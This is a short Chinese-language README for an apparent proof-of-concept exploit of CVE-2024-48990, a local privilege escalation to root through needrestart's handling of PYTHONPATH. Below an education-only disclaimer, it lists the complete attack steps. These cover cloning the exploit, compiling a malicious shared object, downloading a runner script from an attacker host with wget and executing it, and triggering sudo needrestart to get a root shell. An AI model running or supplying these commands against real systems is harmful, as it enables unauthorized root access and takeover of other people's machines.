[!WARNING] 这些文件和信息仅供教育目的使用。 作者不对任何恶意行为负责。 所提供的所有信息均无意煽动任何类型的犯罪或滥用行为。
Qualys 发现,3.8 之前的 needrestart 版本允许本地攻击者通过诱使 needrestart 使用攻击者控制的 PYTHONPATH 环境变量运行 Python 解释器,从而以 root 身份执行任意代码。请参阅 NIST 获取官方详细信息。
git clone https://github.com/grecosamuel/CVE-2024-48990.git
gcc -shared -fPIC -o __init__.so exploit.c
python3 -m http.server
wget http://IP:PORT/runner.sh
chmod +x runner.sh
./runner.sh
sudo needrestart
当看到 [*] CVE module created 时,按 CTRL+C 停止进程并获得你的 shell!